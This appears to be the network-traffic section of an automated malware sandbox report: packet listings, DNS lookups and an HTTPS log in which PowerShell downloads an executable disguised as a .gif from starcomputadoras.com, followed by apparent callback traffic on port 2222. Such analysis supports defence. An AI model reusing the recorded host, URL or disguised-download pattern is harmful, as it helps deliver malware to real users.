Feb 7, 2023 18:30:31.163538933 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.163556099 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.163626909 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.163649082 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.163661957 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.163671017 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.163678885 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.163686991 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.163796902 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.164139032 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.164160967 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.164170980 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.164310932 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.164648056 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.165251017 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.165261030 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.165270090 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.165361881 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.165370941 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.165419102 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.165429115 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.165437937 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.165446043 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.165455103 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.165461063 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.165468931 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.165477991 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.165508986 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.165560007 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.165644884 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.165653944 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.165663004 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.165673018 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.165683031 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.165735006 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.165735006 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.165772915 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.165899992 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.166009903 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.166018963 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.166028023 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.166071892 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.166243076 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.166243076 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.166412115 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.166412115 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.166579962 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.166784048 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.166794062 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.167009115 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.167161942 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.167171955 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.167182922 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.167192936 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.167202950 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.167377949 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.167426109 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.167476892 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.167648077 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.167682886 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.167987108 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.168111086 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.168127060 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.168150902 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.168160915 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.169001102 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.169183016 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.169190884 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.169320107 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.169677973 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.169686079 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.169819117 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.169827938 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.169836044 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.170080900 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.170089960 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.170104027 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.170113087 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.170538902 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.170547009 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.170649052 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.170656919 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.170665026 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.171046972 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.171056032 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.171170950 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.171180010 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.171437979 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.171935081 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.172925949 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.173403978 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.173412085 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.173522949 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.173531055 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.173899889 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.174030066 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.174037933 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.174046040 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.174053907 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.174407005 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.174415112 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.174530983 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.174539089 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.174907923 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.175035954 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.175044060 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.175051928 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.175158978 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.175451994 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.175461054 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.175569057 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.175695896 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.175949097 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.175956964 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.175965071 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.176069021 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.176444054 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.176451921 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.176563978 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.176692009 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.176700115 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.176940918 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.176949024 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.177405119 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.177901030 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.178019047 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.178026915 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.178143024 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.178452015 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.178577900 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.178586960 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.178957939 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.179080963 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.179471970 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.179486990 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.180016994 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.180026054 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.180120945 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.180139065 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.180149078 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.180174112 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.180192947 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.180414915 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.180958033 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.180968046 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.181070089 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.181412935 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.181915045 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.201967001 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.202435017 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.202930927 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.203057051 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.203427076 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.203435898 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.203907967 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.203917027 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.204461098 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.204469919 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.204586029 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.204912901 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.204921007 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.205045938 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.205054998 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.205514908 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.205981970 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.205991030 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.206079006 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.206417084 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.206547022 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.206554890 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.206576109 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.206612110 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.206634045 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.206917048 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.207036018 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.207395077 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.207531929 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.207540989 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.207549095 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.207645893 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.207906008 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.208030939 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.208039999 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.208156109 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.208426952 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.208436966 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.208575010 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.208583117 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.208596945 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.208606005 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.208888054 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.209023952 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.209033966 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.209042072 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.209400892 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.209958076 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.210078955 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.210088015 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.210095882 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.210129023 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.210138083 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.210453033 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.210581064 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.210589886 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.210597992 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.210911036 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.211044073 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.211052895 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.211061001 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.211081982 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.211101055 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.211406946 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.211416006 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.211891890 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.212418079 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.212426901 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.212579012 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.212594032 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.212603092 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.212610960 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.212619066 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.213020086 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.213098049 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.213112116 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.213403940 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.213527918 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.213566065 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.213579893 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.213592052 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.213601112 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.213609934 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.213618994 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.213640928 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.213654995 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.213932991 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.213941097 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.214054108 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.214418888 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.214428902 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.214543104 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.214553118 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.214926958 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.215058088 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.215066910 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.215075970 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.215444088 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.215452909 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.215573072 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.215581894 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.215590954 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.215641975 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.215697050 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.215706110 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.215714931 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.215945005 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.215969086 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.216413975 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.216423035 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.216536045 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.216545105 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.216553926 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.216586113 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.216952085 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.216962099 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.217046976 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.217063904 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.217072964 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.217400074 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.217410088 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.217529058 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.217539072 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.217547894 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.217581987 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.217591047 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.217600107 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.217911005 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.217920065 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.218034983 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.218044996 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.218054056 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.218085051 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.218394041 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.218519926 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.218539953 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.218548059 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.218914986 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.219038010 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.219047070 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.219057083 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.219065905 CET	2222	49855	92.177.204.2	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 7, 2023 18:26:31.846751928 CET	54255	53	192.168.11.20	1.1.1.1
Feb 7, 2023 18:26:32.040287971 CET	53	54255	1.1.1.1	192.168.11.20
Feb 7, 2023 18:30:10.746906996 CET	61266	53	192.168.11.20	1.1.1.1
Feb 7, 2023 18:30:10.756746054 CET	53	61266	1.1.1.1	192.168.11.20
Feb 7, 2023 18:30:11.401789904 CET	54952	53	192.168.11.20	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 7, 2023 18:26:31.846751928 CET	192.168.11.20	1.1.1.1	0x786d	Standard query (0)	starcomputadoras.com	A (IP address)	IN (0x0001)	false
Feb 7, 2023 18:30:10.746906996 CET	192.168.11.20	1.1.1.1	0x1396	Standard query (0)	cisco.com	A (IP address)	IN (0x0001)	false
Feb 7, 2023 18:30:11.401789904 CET	192.168.11.20	1.1.1.1	0x694a	Standard query (0)	www.cisco.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 7, 2023 18:26:32.040287971 CET	1.1.1.1	192.168.11.20	0x786d	No error (0)	starcomputadoras.com		144.217.139.27	A (IP address)	IN (0x0001)	false
Feb 7, 2023 18:30:10.756746054 CET	1.1.1.1	192.168.11.20	0x1396	No error (0)	cisco.com		72.163.4.185	A (IP address)	IN (0x0001)	false
Feb 7, 2023 18:30:11.411663055 CET	1.1.1.1	192.168.11.20	0x694a	No error (0)	www.cisco.com	www.cisco.com.akadns.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

starcomputadoras.com

cisco.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49839	144.217.139.27	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2023-02-07 17:26:32 UTC	0	OUT	GET /lt2eLM6/01.gif HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: starcomputadoras.com Connection: Keep-Alive
2023-02-07 17:26:32 UTC	0	IN	HTTP/1.1 200 OK Date: Tue, 07 Feb 2023 17:26:32 GMT Server: Apache Accept-Ranges: bytes Content-Length: 438776 Connection: close Content-Type: image/gif
2023-02-07 17:26:32 UTC	0	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0e 23 0b 01 02 1f 00 20 03 00 00 c8 04 00 00 04 00 00 80 13 00 00 00 10 00 00 00 30 03 00 00 00 34 69 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 b8 1b 07 00 03 00 40 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 04 00 35 06 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL# 04i@ 5
